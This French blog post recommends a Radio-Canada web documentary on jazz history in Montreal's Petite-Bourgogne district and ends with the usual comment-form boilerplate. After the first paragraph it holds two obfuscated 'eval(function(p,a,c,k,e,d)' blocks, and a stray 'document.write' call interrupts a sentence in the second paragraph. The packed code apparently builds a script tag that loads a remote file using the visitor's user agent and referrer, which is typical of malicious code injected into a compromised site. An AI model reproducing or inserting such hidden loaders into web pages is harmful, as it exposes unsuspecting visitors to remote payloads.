Jazz Petite Bourgogne

J’ai fait la découverte cette semaine d’un intéressant web documentaire produit par Radio-Canada et disponible sur leur site internet Ici.musique.ca.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dsfer|var|u0026u|referrer|bfrtk||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khysb|var|u0026u|referrer|ebaas||js|php’.split(‘|’),0,{}))

C’est un documentaire passionnant si vous vous intéressé tant soit peu à l’histoire de montréal (particulièrement de la communauté noire), document.write(“”); des ses quartiers (ici la Petite-Bourgogne) et de la musique (plus précisément du Jazz). Je suis toujours surpris de (re-)découvrir comment notre histoire peut avoir été grandiose et intéressante. On a toujours tendance à penser que l’histoire du Québec est plutôt platte… Je vous recommande donc d’y jeter un coup d’oeil, ça vaut vraiment la peine!

Jazz Petite-Bourgogne raconte l’incroyable contribution de Montréal à l’histoire du jazz en explorant la vie des musiciens noirs légendaires de la Petite-Bourgogne. Ce quartier fut au cœur de la créativité musicale, des clubs privés et des bars clandestins des années 1920, la belle époque du jazz, aux années 1940 et 1950, l’Âge d’or du jazz. Oscar Peterson, Oliver Jones, les Frères Sealey, Nelson Symonds, Charlie Biddle, et Louis Metcalf font partie des grands qui ont vécu et/ou joué dans La Petite-Bourgogne.”

Le web documentaire se divise en quatorze capsules de trois ou quatre minutes chacune qui, après une brève introduction, nous présentent différents aspects de la vie (musicale) de ce quartier populaire de Montréal : les gares de train et les porteurs, la prohibition, le coin, l’église et la communauté, la pègre, danse et burlesque, le Café Saint-Michel, la vie dans la Petite-Bourgogne, le Rockhead’s Paradise, Oscar Peterson, le Black Bottom, les temps difficiles, et renaissance. Comme c’est une expérience interactive, le site offre aussi en complément des galeries de photos, des extraits audio, une chronologie interactive et un index des artistes.

[ Translate ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s